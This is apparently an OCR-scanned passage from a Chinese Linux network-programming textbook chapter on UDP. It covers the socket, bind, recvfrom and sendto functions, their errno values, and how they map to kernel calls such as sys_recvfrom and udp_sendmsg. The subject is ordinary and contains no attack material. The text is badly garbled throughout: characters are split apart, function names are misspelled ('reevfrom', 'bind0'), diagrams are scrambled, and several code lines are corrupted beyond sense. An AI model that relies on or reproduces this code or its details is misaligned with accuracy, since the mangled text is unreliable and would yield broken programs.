图 10.1 中 对 UDP 协议 中 的 服务 器 程序 框架 进行 了 说 明 。 服 务 器 流程 主要 分 为 下 述 6 
个 部 分 ， 即 建立 套 接 字 、 设 置 套 接 字 地 址 参数 、 进 行 端口 绑 定 、 接 收 数据 、 发 送 数据 、 关 
闭 套 接 字 等 。 

(1) 建立 套 接 字 文件 描述 符 ， 使 用 函数 socket()， 生 成 套 接 字 文件 描述 符 ， 例 如 : 

int s = socket (AF INET, SOCK DGRAM, 0); 

建立 一 个 AF_INET 族 的 数据 报 套 接 字 , UDP 协议 的 套 接 字 使 用 SOCK_DGRAM 选项 。 

(2) 设置 服务 器 地 址 和 侦 听 端口 ， 初 始 化 要 绑 定 的 网 络 地 址 结构 ， 例 如 : 


struct sockaddr addr serv; 


addr serv.sin family = AF_INET; /* 地 址 类 型 为 AF_INET*/ 
addr_ serv.sin addr.s addr = htonl (INADDR ANY); /* 任 意 本 地 地 址 */ 
addr_serv.sin port = htons (PORT SERV); /* 服 务 器 端口 */ 


地 址 结构 的 类 型 为 AF_INET; IP 地 址 为 任意 的 本 地 地 址 ; 服务 器 的 端口 为 用 户 定义 的 
端口 地 址 ; 注意 成 员 sin_addr.s_addr 和 sin_port 均 为 网 络 字 节 序 。 

(3) 绑 定 侦 听 端口 ， 使 用 bind0) 函 数 ， 将 套 接 字 文件 描述 符 和 一 个 地 址 类 型 变量 进行 
绑 定 ， 例 如 : 


bind(s, (struct sockaddr*) &addr serv, sizeof(addr serv)); /* 绑 定 地 址 */ 


(4) 接收 客户 端的 数据 ， 使 用 recvfrom() 函 数 接收 客户 端的 网 络 数据 。 
(5) 向 客户 端 发 送 数据 ， 使 用 sendto() 函 数 向 服务 器 主机 发 送 数 据 。 
(6) 关闭 套 接 字 ， 使 用 close() 函 数 释放 资源 。 


10.1.3 UDP 客户 端 编程 框架 


在 图 10.1 中 ， 同 样 对 UDP 协议 的 客户 端 流程 进行 了 描述 ， 按 照 图 中 所 示 ，UDP 协议 
的 客户 端 流程 分 为 套 接 字 建立 、 设 置 目 的 地 址 和 端口 、 向 服务 器 发 送 数据 、 从 服务 器 接收 
数据 、 关 闭 套 接 字 5 个 部 分 。 与 服务 器 端的 框架 相 比 ， 少 了 bind0 部 分 ， 客 户 端 程序 的 端 
口 和 本 地 的 地 址 可 以 由 系统 在 使 用 时 指定 。 在 使 用 sendto() 和 recvfrom() 的 时 候 ， 网 络 协议 
栈 会 临时 指定 本 地 的 端口 和 地 址 ， 流 程 如 下 : 

(1) 建立 套 接 字 文件 描述 符 ，socket(); 

(2) 设置 服务 器 地 址 和 端口 ，struct sockaddr; 

(3) 向 服务 器 发 送 数 据 ，sendto(); 

(4) 接收 服务 器 的 数据 ，recvfrom(); 

(5) 关闭 套 接 字 ，close()。 


10.2 ”UDP 协议 程序 设计 的 常用 函数 


UDP 协议 常用 的 函数 有 recvO/ecvfrom()、send(0/sendto(0)、socket0、bind0 等 。 当 然 这 
些 函 数 同样 可 以 用 于 TCP 协议 的 程序 设计 。 
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10.2.1 建立 套 接 字 socket() 和 绑 定 套 接 字 bind() 


UDP 协议 建立 套 接 字 的 方式 同 TCP 方式 一 样 ， 使 用 socket() 函 数 ， 只 不 过 协议 的 类 型 
使 用 SOCK DGRAM， 而 不 是 SOCK_STREAM。 例 如 ， 下 面 是 建立 一 个 UDP 套 接 字 文 件 
描述 符 的 代码 。 

2 ee (AF_INET, SOCK DGRAM, 0); 

UDP 协议 使 用 bind0 函 数 的 方法 与 TCP 没有 什么 差别 , 将 一 个 套 接 字 描述 符 与 一 个 地 
址 结构 绑 定 在 一 起 。 例 如 ， 下 面 的 代码 将 一 个 本 地 的 地 址 和 套 接 字 文 件 描述 符 绑 定 在 了 
要 -起 。 


struct sockaddr in local; /* 本 地 的 地 址 信息 */ 
int from len = sizeof (from); /* 地 址 结构 的 长 度 */ 
local. sin family = RE _ INET; /* 协 议 族 */ 

local. sin port = htons(8888); /* 本 地 端口 */ 

local. sin addr.s addr = htonl (INADDR ANY); /* 任 意 本 地 地 址 */ 

s = socket (AF INET, SOCK DGRAM, 0); /* 初 始 化 一 个 IPv4 族 的 数据 报 套 接 字 */ 
if (s == -1) { /* 检 查 是 否 正常 初始 化 socket*/ 


perror ("socket"); 
exit (EXIT FAILURE); 
} 
bind(s， (struct sockaddr*) &local,sizeof (local)); /+ 套 接 字 绑 定 */ 


绑 定 函数 bind(O) 使 用 的 时 机 ， 即 什么 时 候 需 要 绑 定 需要 介绍 一 下 。 函数 bind() 的 作用 是 
将 一 个 套 接 字 文 件 描述 符 与 一 个 本 地 地 址 绑 定 在 一 起 , 即 把 发 送 数 据 的 端口 地 址 和 IP 地 址 
进行 了 指定 。 例 如 在 发 送 数据 的 时 候 ， 如 果 不 进 行 绑 定 ， 则 会 临时 选择 一 个 随机 的 端口 。 


10.2.2 ”接收 数据 recvfrom()/recv() 


当 客户 端 成 功 建立 了 一 个 套 接 字 文 件 描述 符 并 构建 了 合适 的 struct sockaddr 结构 或 者 
服务 器 端 成 功 地 将 套 接 字 文件 描述 符 和 地 址 结构 绑 定 后 ， 可 以 使 用 recv() 或 者 recvfrom() 
来 接收 到 达 此 套 接 字 文件 描述 符 上 的 数据 ， 或 者 在 这 个 套 接 字 文 件 描述 符 上 等 待 数据 的 
到 来 。 


1. recv() 函 数 和 recvfrom() 函 数 介绍 
recv() 函 数 和 recvfrom0 〇 函数 的 原型 如 下 : 


#include <sys/types.h> 

#include <sys/socket.h> 

ssize t recvl(int s, void*buf, size t len, int flags); 

ssize t recvfrom(int s, void*buf, size t len, int flags, 
struct sockaddr*from, socklen t*fromlen); 


第 1 个 参数 s 表示 正在 监听 端口 的 套 接口 文件 描述 符 ， 它 由 函数 socket() 生 成 。 


第 2 个 参数 buf 表示 接收 数据 缓冲 区 ， 接 收 到 的 数据 将 放 在 这 个 指针 所 指向 的 内 存 空 
间 中 。 
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第 3 个 参数 len 表示 接收 数据 缓冲 区 的 大 小 ， 系 统 根据 这 个 值 来 确保 接收 缓冲 区 的 安 
全 ， 防 止 溢出 。 

第 4 个 参数 from 是 指向 本 地 的 数据 结构 sockaddr in 的 指针 ， 接 收 数据 时 发 送 方 的 地 
址 信息 放 在 这 个 结构 中 。 

第 5 个 参数 fromlen 表示 第 4 个 参数 所 指 内 容 的 长 度 ,可 以 使 用 sizeoflstruct sockaddr in) 
来 获得 。 

recv() 函 数 和 recvfrom() 函 数 的 返回 值 在 出 错 的 时 候 返 回 -1;， 在 成 功 的 时 候 ， 函 数 将 返 
回 接收 到 的 数据 长 度 , 数据 的 长 度 可 以 为 0, 因此 如 果 函 数 返回 值 为 0， 并 不 表示 发 生 了 错 
误 ， 仅 能 表示 此 时 系统 中 接收 不 到 数据 。 发 生 错误 的 时 候 ， 错 误 值 保存 在 errno 中 ，error 
的 值 和 含义 如 表 10.1 所 示 。 


表 10.1 recv 的 errno 值 及 含义 


值 含义 
EAGAIN 接收 超时 ， 或 者 套 接 字 描述 符 设置 为 非 阻塞 ， 而 此 时 没有 数据 
EAGAINEWOULDBLOCK 此 socket 使 用 了 非 阻塞 模式 ， 当 前 情况 下 没有 可 接收 的 连接 
EBADF 描述 符 非法 
ECONNABORTED 连接 取消 
EINTR 信号 在 合法 连接 到 来 之 前 打 断 了 accept 的 系统 调用 
EINVAL socket 没有 侦 听 连接 或 者 地 址 长 度 不 合法 
EMFILE 每 个 进程 允许 打开 的 文件 描述 符 数量 最 大 值 已 经 到 达 
ENFILE 达到 系统 允许 打开 文件 的 总 数量 
ENOTSOCK 文件 描述 符 是 一 个 文件 ， 不 是 socket 
EOPNOTSUPP 引用 的 socket 不 是 流 类 型 SOCK_STREAM 
EFAULT 参数 addr 不 可 写 
ENOBUFS/ENOMEM 内 存 不 足 
EPROTO 协议 错误 
EPERM 防火 墙 不 允许 连接 


全 注意 ; 函数 recvfrom() 中 的 参数 fom 和 fromlen 均 为 指针 ， 不 要 直接 将 地 址 结构 类 型 和 
地 址 类 型 的 长 度 传 入 函数 中 ， 需 要 进行 取 地 址 的 运算 。 


2. 使 用 recvfrom() 函 数 的 例子 


下 面 是 一 个 简单 的 例子 ， 通 过 这 个 例子 读者 可 以 了 解 如 何 使 用 recvfrom() 函 数 ， 以 及 
什么 时 候 使 用 recvfrom() 函 数 。 

下 面 的 代码 ， 先 建立 一 个 数据 报 套 接 字 文 件 描述 符 s， 在 地 址 结构 local 设置 完毕 后 ， 
将 套 接 字 s 与 地 址 结构 local 绑 定 在 一 起 。 

#include <string.h> 

#include <sys/types.h> 

#include <sys/socket.h> 

int main(int argc, char*argv[]) 
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Lnt Ss /* 套 接 字 文件 描述 符 */ 

struct sockaddr in from; /* 发 送 方 的 地 址 信息 */ 

struct sockaddr in local; /* 本 地 的 地 址 信息 */ 

int from len = sizeof (from); /* 地 址 结构 的 长 度 */ 

Tn ny /* 接 收 到 的 数据 长 度 */ 

char buf[128]; /* 接 收 数据 缓冲 区 */ 

s = socket (AF_INET，SOCK_DGRAM，0); /* 初 始 化 一 个 IPv4 族 的 数据 报 套 接 字 */ 
if (s == -1) { /* 检 查 是 否 正常 初始 化 socket*/ 


perror ("socket"); 
exit (EXIT FAILURE); 


} 

local. sin family = AF_ INET; /* 协 议 族 */ 
local. sin port = htons(8888); /* 本 地 端口 */ 
local. sin addr.s addr = htonl (INADDR ANY); /* 任 意 本 地 地 址 */ 


bind(s， (struct sockaddr*) &local,sizeof (local));  ”/* 套 接 字 绑 定 */ 


套 接 字 与 地 址 绑 定 成 功 后 ， 服 务 器 可 以 直接 通过 这 个 套 接 字 接 收 数据 ,recvfrom() 函 数 
从 套 接 字 s 中 每 次 可 以 接收 128 个 字 节 的 数据 并 保存 到 缓冲 区 bu 任 中 。 函 数 recvfrom() 所 
接收 数据 的 来 源 可 以 从 变量 from 中 获得 ， 包 含 发 送 数据 的 主机 卫 地 址 、 端 口 等 信息 ， 变 
量 from_len 是 发 送 数据 主机 地 址 结构 的 类 型 长 度 。 
n= recvfrom(s, buff, 128, 0, (struct sockaddr*)&from, &from len) 
E(t == TD /* 接 收 数据 出 错 */ 
perror ("recvfrom"); 
exit (EXIT FAILURE); 
} 
/* 处 理 数据 */ 
; 3 


上 面 的 例子 在 使 用 recvfrom() 函 数 的 时 候 ， 没 有 绑 定 发 送 方 的 地 址 。 所 以 在 接收 数据 
的 时 候 要 判断 发 送 方 的 地 址 ， 只 有 合适 的 发 送 方才 能 进行 相应 的 处 理 ， 因 为 不 同 的 发 送 方 
发 送 的 数据 都 可 以 到 达 接 收 方 的 套 接 字 文件 描述 符 , 这 是 由 于 UDP 协议 没有 按照 连接 进行 
区 分 造成 的 ， 如 图 10.2 所 示 。 


客户 端 A0 服务 器 端 B 客户 端 A1 
1 1 
发 送 UDP 数据 接收 UDP 数据 发 送 UDP 数 据 


图 10.2 ”多 个 发 送 方 均 可 以 到 达 接收 方 


3. 应 用 层 recv() 函 数 和 内 核 函 数 的 关系 


应 用 层 的 recvfrom() 和 内 核 层 的 recvfrom0) 的 关系 参见 图 10.3。 应 用 层 的 recvfrom() 函 
数 对 应 内 核 层 的 sys_recvfrom() 系 统 调用 函数 。 
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recv0) 函 数 接收 到 sockfd 对 应 的 socket 的 数据 


n= reevfrom(soekfd, buff.BUFFSIZE,0,(struet 
sockaddr* )&from.addrlen): 应 用 层 


内 核 层 eevfiom() 函 数 对 应 的 系统 调用 函数 
4 sys_recvfrom() 


long sys_reevfrom(int fd, void _user *ubuf, size_t size, Pe i 
unsigned flags, struct sockaddr user *addr, 1 还 数 sockfd_lookup jighiO 忽 得 文 件 扩 述 得 sockfd 对 频 
int user yaddr len) 的 内 核 结构 struet sock 的 指针 
全 = 2. 增 加 文件 描述 符 的 引用 计数 


1. 定义 消息 变量 msg 和 向 量变 最 iov 

2. msg_control 和 msg_controllen 设 置 为 空 

3 .将 向 量 iov 挂 接 到 清 息 的 成 员 msg_iov 上 ， 并 将 消息 msg 的 变 
最 个 数 设置 为 ! 

4 向 量 iov 的 大 小 为 用 户 缓冲 区 的 大 小 size， 缓 冲 区 地 址 为 用 于 
缓冲 区 的 地 址 ubuf 

5. 消 息 msg 的 名 称 为 地 址 ，msg 的 名 称 长 度 为 
MAX_SOCK_ADDR， 为 128 


struct socket *sock; 
int err, fput_needed; 
sock = sockfd_lookup_light(sockfd, &err, &fput_needed); 


| 


struct iovec iov: i 
Struct msghdr msg; 协议 族 AF_INET 的 
udp_reevmsg() 函 数 


msg.msg_control = NULL; 


msg,msg_controllen = 0; 从 sk 对 应 的 链 中 查找 是 否 有 接收 到 的 
msg.msg_iovien 数据 
msg.msg_iov 
ioviov_ len = si 
ioviov ubuf 
msg.msg_name = address; struct sk_buff *skb: 
msg.msg_namelen = MAX_SOCK_ADDR; tagram(sk, flags 根据 链 中 数据 的 
接收 sock 对 应 文件 描述 A 长 度 确 定 复制 到 
符 的 数据 ， 放 到 消息 EE se 应 用 层 数据 的 长 
msg 中 ， 操 作 方 式 由 = SBSTen sizeoTlstruet udPPdry: 度 
flags 指 定 ied > ulen) 
else if (copied < ulen) 
msg->msg_flags = MSG_TRUNC; 
err = sock_recvmsg(sock, &msg. size, flags); 本 
TISRR csum UneCcSSRTYISR 向 msg 变 量 的 
err= skb_copy_datagram_iovec(skb, mse iov 复 制 数 
将 内 核 空间 的 sizeoffstruct udphdr), _ msg->msg_iov, 所 
地 址 信息 复制 Satic inline int — sock_recvmsg(struct Kioch Tioch, copied 和 a 
到 用 户 空间 struct socket *sock, struct msghdr *msg, size_t size, else { 
ml int flags) err 一 
Skb_copy_and_csum._datagram_iovec(skb) 
sizeoftstruct udphdr), msg->msg_iov); 
if (er — -EINVAL) 
goto csum_copy_err 
FCopy the address. */ 复制 地 址 
err2 = move_addr_to_user(address, msg.msg_namelen, addr, 人 (sin) 
减少 套 接 字 addr_len); sin->sin_family = AF_INET: 
文件 描述 符 的 sin->sin_port = udp_hdr(skb)->source; 
引用 计数 | | > beatby: 根据 消息 的 选项 
ee 人 ns ze, ), sizeoftsin- [接收 控制 消息 
} 
fput_light(sock->file, fput_needed); i T 
Tinet Semsg fags) 销 虹 数据 链 中 的 
cmsg_recv(msg, skb); 数据 
datagram(sk, skb) 


图 10.3 应 用 层 recvfrom0 和 内 核 层 sys_recvfrom() 的 关系 图 
系统 调用 函数 sys_recvfrom 主要 查找 文件 描述 符 对 应 的 内 核 socket 结构 ， 建 立 一 个 消 


息 结构 ; 将 用 户 空 间 的 地 址 缓冲 区 指针 和 数据 缓冲 区 指针 打包 到 消息 结构 中 ， 在 套 接 字 文 
件 描述 符 中 对 应 的 数据 链 中 查找 对 应 的 数据 ; 将 数据 复制 到 消息 中 ; 销毁 数据 链 中 的 数据 ， 
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将 数据 复制 到 应 用 层 空 间 ; 减少 文件 描述 符 的 引用 计数 。 

sys_recvfrom() 调 用 函数 sockfd lookup_light() 查 找到 文件 描述 符 对 应 的 内 核 socket 结 
构 后 ， 会 申请 一 块 内 存 用 于 保存 连接 成 功 的 客户 端 状态 。socket 结构 的 一 些 参数 ， 例 如 类 
型 type、 操 作 方式 ops 等 会 继承 服务 器 原来 的 值 ， 如 果 原 来 服务 器 的 类 型 为 AF_ INET， 则 
其 操作 模式 仍然 是 af inet'c 文件 中 的 各 个 函数 。 然 后 会 查找 文件 描述 符 表 ， 获 得 一 个 新 结 
构 对 应 的 文件 描述 符 。 

在 内 核 空间 使 用 了 一 个 消息 结构 msghdr 用 来 存放 所 有 的 数据 结构 ， 其 原型 如 下 : 


struct msghdr { 


void * msg name; /*Socket 名 称 */ 

int msg_namelen; /*Socket 名 称 的 长 度 */ 
struct iovec* msg iov; /* 向 量 , 存放 数据 */ 

_ kernel size t msg iovlen; 人 # 向 量 数量 */ 

void * msg_ control; /#* 协 议 幻 数 */ 

_ kernel size t msg controllen; /*msg_control 的 数量 */ 
unsigned msg_flags; /#* 消 息 选项 */ 


] 

结构 的 成 员 msg_name 和 msg_namelen 中 存放 发 送 方 的 地 址 相关 的 信息 。 一 个 向 量 放 
在 msg_iov 中 ， 存 放 接收 到 的 数据 。 向 量 成 员 iov_base 指向 用 户 传 入 的 接收 数据 缓冲 区 地 
址 ，iov_len 为 用 户 传 入 的 接收 缓冲 区 长 度 。 其 示意 图 参见 图 10.4。 


address 
len 
Iov_base=ubuf 
msg_name Iov_len=size 
msg_iov 

msg_namelen 7 1 
msg_iov 
msg_iovlen 
msg_control | 
msg_controllen 0 
msg_flags 


图 10.4 消息 结构 msghdr 存放 recvfrom 的 各 个 参数 


对 于 AF_INET 族 ，recvfrom 对 应 于 udp_recvmsg() 函 数 ， 其 实现 在 文件 af inetc 中 。 
分 为 如 下 步骤 : 

(1) 接收 数据 报 数据 。 在 接收 的 时 候 根据 设置 的 超时 时 间 来 确定 是 否 要 一 直 等 待 至 数 
据 到 来 。 例 如 当 flag 为 MSG_DONTWAIT 时 ， 仅 仅 查 看 一 下 ， 如 果 没 有 数据 就 退出 ; 否则 
就 一 直 等 至 超时 时 间 的 到 来 。 在 接收 数据 的 时 候 ， 根 据 是 否 设置 了 MSG_PEEK 标志 ， 决 
定 是 否 将 数据 复制 后 销毁 数据 ， 或 者 仅仅 将 数据 复制 ， 而 不 销毁 其 中 的 数据 。 

(2) 计算 复制 出 的 数据 长 度 ， 当 接收 到 的 数据 长 度 比 用 户 缓冲 区 的 长 度 大 时 ， 设 置 
MSG _TRUNC 标志 ， 方 便 下 一 次 的 复制 。 

(3) 将 数据 复制 到 用 户 缓冲 区 空间 。 

(4) 复制 发 送 方 的 地 址 和 协议 族 。 
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(5) 根据 消息 结构 的 标志 设置 ， 接 收 其 他 的 信息 ， 例 如 TTL、TOS、 选 项 等 。 
(6) 销毁 数据 报 缓冲 区 的 对 应 变量 。 


10.2.3 发 送 数据 sendto()/send() 


当 客户 端 成 功 地 建立 了 一 个 套 接 字 文 件 描 述 符 ， 并 构建 了 合适 的 struct sockaddr 结构 
或 者 服务 器 端 成 功 地 将 套 接 字 文件 描述 符 和 地 址 结构 绑 定 后 , 可 以 使 用 send() 或 者 sendto() 
函数 来 发 送 数据 到 某 个 主机 上 。 

1. send() 函 数 和 sendto() 函 数 介绍 

send() 函 数 和 sendto() 函 数 的 原型 如 下 : 


#include <sys/types.h> 

#include <sys/socket.h> 

ssize t send(int s, const void*buf, size t len, int flags); 

ssize t sendto(int s, const void*buf, size t len, int flags, const 
struct sockaddr*to, socklen t tolen); 


第 1 个 参数 s 是 正在 监听 端口 的 套 接口 文件 描述 符 ， 通 过 函数 socket 获得 。 

第 2 个 参数 buf 是 发 送 数 据 缓冲 区 ， 发 送 的 数据 放 在 此 指针 指向 的 内 存 空 间 中 。 

第 3 个 参数 len 是 发 送 数 据 缓冲 区 的 大 小 。 

第 4 个 参数 to 指向 目的 主机 数据 结构 sockaddr_in 的 指针 ， 接 收 数据 的 主机 地 址 信息 
放 在 这 个 结构 中 。 

第 5 个 参数 tolen 表示 第 4 个 参数 所 指 内 容 的 长 度 , 可 以 使 用 sizeoflstruct sockaddr_in) 
来 获得 。 

send() 函 数 和 sendto() 函 数 的 返回 值 在 调用 出 错 的 时 候 返 回 -1;， 在 调用 成 功 的 时 候 ， 返 
回 发 送 成 功 的 数据 长 度 ， 数 据 的 长 度 可 以 为 0， 因 此 函数 返回 值 为 0 的 时 候 是 合法 的 。 发 
生 错 误 时 errno 的 值 如 表 10.2 所 示 。 


表 10.2 send() 函 数 的 errno 值 及 含义 


值 含义 
EAGAIN 接收 超时 ， 或 者 套 接 字 描述 符 设置 为 非 阻塞 ， 而 此 时 没有 数据 
EAGAIN/EWOULDBLOCK 此 socket 使 用 了 非 阻塞 模式 ， 当 前 情况 下 没有 可 接收 的 连接 
EBADF 描述 符 非法 
ECONNABORTED 连接 取消 
EINTR 信号 在 合法 连接 到 来 之 前 打 断 了 accept 的 系统 调用 
EINVAL socket 没有 侦 听 连接 或 者 地 址 长 度 不 合法 
EMFILE 每 个 进程 允许 打开 的 文件 描述 符 数量 最 大 值 已 经 到 达 
ENFILE 达到 系统 允许 打开 文件 的 总 数量 
ENOTSOCK 文件 描述 符 是 一 个 文件 ， 不 是 socket 
EOPNOTSUPP 引用 的 socket 不 是 流 类 型 SOCK_STREAM 
EFAULT 参数 addr 不 可 写 
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值 含 义 
ENOBUFS/ENOMEM 内 存 不 足 
EPROTO 协议 错误 
EPERM 防火 墙 不 允许 连接 


2. 使 用 函数 sendto() 的 例子 


下 面 是 一 个 使 用 sendto() 函 数 发 送 数据 的 简单 例子 。 在 这 个 例子 中 ， 先 调用 socket0 函 
数 产 生 一 个 数据 报 类 型 的 套 接 字 文 件 描述 符 ; 然后 设置 发 送 数据 的 目的 主机 的 卫 地 址 和 端 
口 ， 将 这 些 数值 赋 给 地 址 结构 ， 当 地 址 结构 设置 完毕 后 ， 调 用 sendto0) 函 数 将 需要 发 送 的 
数据 通过 sendto() 函 数 发 送出 去 


#include <string.h> 

#include <sys/types.h> 
#include <sys/socket.h> 

int main(int argc, char*argv[]) 


{ 


int s; /* 套 接 字 文 件 描述 符 */ 

struct sockaddr in to; /* 接 收 方 的 地 址 信息 */ 

int ny /* 发 送 到 的 数据 长 度 */ 

char buf[128]; /* 发 送 数 据 缓冲 区 */ 

s = socket (AF_INET，SOCK_DGRAM，0) ; /* 初 始 化 一 个 IPv4 族 的 数据 报 套 接 字 */ 
有 (SEE It /* 检 查 是 否 正常 初始 化 socket*/ 


perror ("socket"); 
exit (EXIT FAILURE); 
EF 
to.sin family = AF_INET; /* 协 议 族 */ 
to.sin port = htons(8888); /* 本 地 端口 */ 
to.sin addr.s addr = inet addr("192.168.1.1"); 
/* 将 数据 发 送 到 主机 192.169.1.1 上 */ 


n= sendto(s, buff, 128, 0, (struct sockaddr*) gto, sizeof (to)); 
/* 将 数据 buff 发 送 到 主机 to 上 */ 
人 /* 发 送 数据 出 错 */ 
perror ("sendto"); 
exit (EXIT FAILURE); 


} 
/* 处 理 过 程 #/ 
} 


sendto(0) 函 数 发 送 的 过 程 比较 简单 ， 如 图 10.5 所 示 。 在 本 例 的 发 送 过 程 中 ， 由 于 没有 
设置 本 地 的 IP 地 址 和 本 地 端口 , 而 这 些 参数 是 网 络 协议 栈 发 送 数 据 时 的 必需 条 件 ， fa 
UDP 层 网 络 协议 栈 会 选择 合适 的 端口 。 发 送 的 网 络 数据 经 过 IP 层 的 时 候 ， 客 户 端 会 选 
合适 的 本 地 IP 地 址 进行 填充 ， 并且 将 客户 端的 目的 了 P 地 址 填充 到 IP 报 文中 。 
到 达 数 据 链 路 层 的 时 候 ， 会 根据 硬件 的 情况 进行 发 送 。 
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sendto0) 国 数 的 
客户 端 执行 过 程 


客户 端 选 出 
UDP 层 临时 端口 


指定 服务 器 
的 绑 定 端口 


客户 端 选 出 
JP 地 址 


指定 服务 器 
的 人 P 地 址 


数据 链 路 层 


图 10.5 发 送 数据 sendto() 示 意图 


3. 应 用 层 sendto() 函 数 和 内 核 函 数 的 关系 


应 用 层 的 sendto() 和 内 核 层 的 sendto() 的 关系 参见 图 10.6。 应 用 层 的 sendto() 函 数 对 应 
内 核 层 的 sys_sendto() 系 统 调用 函数 。 系 统 调用 函数 sys_sendto() 查 找 文件 描述 符 对 应 的 内 
核 socket 结构 、 建 立 一 个 消息 结构 、 将 用 户 空间 的 地 址 缓冲 区 指针 和 数据 缓冲 区 指针 打包 
到 消息 结构 中 、 在 套 接 字 文件 描述 符 中 对 应 的 数据 链 中 查找 对 应 的 数据 、 将 数据 复制 到 消 
息 中 、 更 新 路 由 器 信息 、 将 数据 复制 到 IP 层 、 减 少 文件 描述 符 的 引用 计数 。 

sys_sendto() 调 用 函数 sockfd_lookup_light() 查 找到 文件 描述 符 对 应 的 内 核 socket 结构 
后 ， 会 申请 一 块 内 存 用 于 保存 连接 成 功 的 客户 端的 状态 。socket 结构 的 一 些 参数 ， 例 如 类 
型 type、 操 作 方 式 ops 等 会 继承 服务 器 原来 的 值 ， 如 果 原 来 服务 器 的 类 型 为 AF_INET， 那 
么 它 的 操作 模式 仍然 是 在 文件 af_inet.c 中 定义 的 各 个 函数 。 然 后 会 查找 文件 描述 符 表 ， 获 
得 一 个 新 结构 对 应 的 文件 描述 符 。 在 内 核 空 间 使 用 了 一 个 消息 结构 msghdr 用 来 存放 所 有 的 


数据 结构 ， 其 原型 如 下 : 


struct msghdr { 
void * msg _ name; 
dat msg_namelen; 
struct iovec* msg iov; 
_ kernel size t msg iovlen; 
void # msg_ control; 
__ kernel size t msg_ controllen; 
unsigned msg_flags; 


/*Socket 名 称 */ 
/*Socket 名 称 的 长 度 */ 
/* 向 量 , 存放 数据 */ 

/* 向 量 数 量 */ 

/* 协 议 幻 数 */ 
/*msg_control 的 数量 #/ 
/* 消 息 选项 */ 


me 
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sendto0 函 数 接收 到 sockfda 对 应 的 socket 的 数据 


n= sendto(sockfd, buff.BUFFSIZE,0.(struct 
sockaddr* )&to.addrien): 


> 


内 核 层 


long sys_sendto(int fd, void _user *ubuf. size_t size, 
unsigned flags, struct sockaddr __user *addr, 
int _user addr_ len) 


接收 sock 对 应 文件 描 


符 的 数据 ， 放 到 消息 
msg 中 ， 操 作 方式 由 
flags 指 定 


fput_light(sock->file, fput_needed); 
减少 套 捞 | 二 
文件 描述 符 的 


引用 计数 | 


struct socket *sock; 
int err, fput_needed; 
sock = sockfd_lookup_lighttsockfd &err, &fput_needed); 


msg.msg_iovlen ~ 1; 
msg.msg_control = NULL; 
msg.msg_controllen 

msg.msg_namelen ~ 


if (addr) { 


address); 


recvfrom() 函 数 对 应 的 系统 调用 函数 


sys_reevfiom0) 
1. 函 数 sockfd_lookup_light 获得 文件 描述 符 sockfd 对 应 


的 内 核 结构 struct sock 的 指针 
2. 增 加 文件 描述 符 的 引用 计数 


1. 定义 消息 变量 msg 和 向 量变 量 iov 
2. msg_control 和 msg_controllen 设 置 为 空 

将 向 景 iov 挂 接 到 消息 的 成 员 msg_iov 上， 并 将 
量 个 数 设置 为 1 
4 向量 iov 的 大 小 为 用 户 缓冲 区 的 大 小 size， 缓 促 区 地 址 为 用 于 
缓冲 区 的 地 址 ubuf 
5. 如 果 有 接收 方 的 地 址 ， 则 消息 msg 的 名 称 为 地 址 ，msg 的 名 
称 长 度 为 MAX_SOCK_ADDR， 为 128 


sg 的 变 


协议 族 AF_INET 的 udp_sendmsg0 函 数 


判断 是 否 为 带 外 数据 ，UDP 不 支持 此 项 


err ~ move_addr_to_kemnel(addr, addr_len, 


if(err<0) 
goto out_put; 
msg.msg_name = address; 


if (msg->msg_flagsé MSG_OOB) /* Mirror 
BSD error message compatibility */ 
return -EOPNOTSUPP: 


msg.msg_namelen = addr_len: 
Tup->per 


{ 


err = sock_sendmsg(sock, &msg. len): 


ret = _sock_sendmsg(&iocb, sock, msg, size); 


lock_sock(sk); 
if (likely(up->pending)) { 
if (unlikely(up->pending != AF_INET)) 


release_sock(sk); 


rngy 


Telease_ sock(sk): 
return -EINVAL:; 


， goto do_append_data; 


err =ip_emsg send(sock_net(sk), msg, 


是 否 合 有 
pending 选 项 ， 

如 果 有 仅仅 进行 
查看 是 否 可 发 送 
数据 


是 否 发 送 把 


1 天 


[是 否 广播 来 更 新 
广播 地 址 


if( 


ddr) 
saddr = inet->me_addr: 
connected = 0; 


[TOpva is_multcasi(daddr)) T 
oif) 


f= inet->me_index: 


L 


此 处 进行 路 由 更 新 


i 


err ~ ip_append_data(sk, getfrag, msg- 
>msg_iov, ulen.sizeoftstruct udphdr), &ipe, 
rt.corkreq ? msg->msg_flags MSG_MORE : 
msg->msg_flags); 


"2 


图 10.6 ”应 用 层 sendto 和 内 核 层 sys_sendto 的 关系 图 
在 结构 的 成 员 msg_name 和 msg_namelen 中 存放 发 送 方 地 址 相关 的 信息 。 建 立 一 个 向 


量 放 在 msg_iov 中 ， 用 于 存放 发 送 的 数据 。 向 量 成 员 iov_base 指向 用 户 传 入 的 发 送 数据 组 
冲 区 地 址 ，iov_len 为 用 户 传 入 的 发 送 缓冲 区 长 度 。 消 息 结构 msghdr 存放 recvfrom 的 各 个 


[数据 帮 到 mp 层 
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参数 如 图 10.7 所 示 。 


Jov_base=ubuf 
msg_name 


- Tov_len=size 
msg_iov 


msg_namelen 


msg_iov 


msg_iovlen 


msg_control 


msg_controllen 


msg_flags 


图 10.7 


消息 结构 msghdr 存放 recvfrom() 的 各 个 参数 
对 于 AF_INET 族 ，sendto() 对 应 于 udp_sendmsg() 函 数 ， 其 实现 在 文件 af inetc 中 。 分 
为 如 下 步骤 : 

(1) 发 送 数据 报 数据 。 在 发 送 数据 的 时 候 , 查看 是 否 设置 了 pending, 如 果 设 置 了 此 项 ， 
则 仅仅 进行 检查 是 否 可 以 发 送 数 据 ， 然 后 退出 。 如 果 选 项 中 设置 了 OOB， 则 退出 ,不 能 进 
行 此 项 的 发 送 。 

(2) 确定 接收 方 的 地 址 和 协议 族 。 

(3) 将 数据 复制 到 用 户 缓冲 区 空间 。 

(4) 根据 消息 结构 的 标志 设置 ， 发 送 其 他 的 信息 ， 如 TTL、TOS、 选 项 等 。 

(5) 查看 是 否 为 广播 ， 如 果 是 ， 则 更 新 广播 地 址 。 

(6) 更 新 路 由 。 

(7) 将 数据 放 入 也 层 。 

(8) 销毁 数据 报 缓冲 区 的 对 应 变量 。 


10.3 UDP 接收 和 发 送 数 据 的 例子 


本 节 将 介绍 一 个 简单 的 UDP 服务 器 和 客户 端的 例子 ， 说 明 如 何 使 用 UDP 函数 进行 程 
序 设计 。 例 子 的 程序 框架 如 图 10.8 所 示 ， 客 户 端 向 服务 器 发 送 字符 串 UDPTEST， 服 务 器 
接收 到 数据 后 将 接收 到 的 字符 串 发 送 回 客户 端 。 


“UDP TEST” 


sendto 


recvfrom 
od 


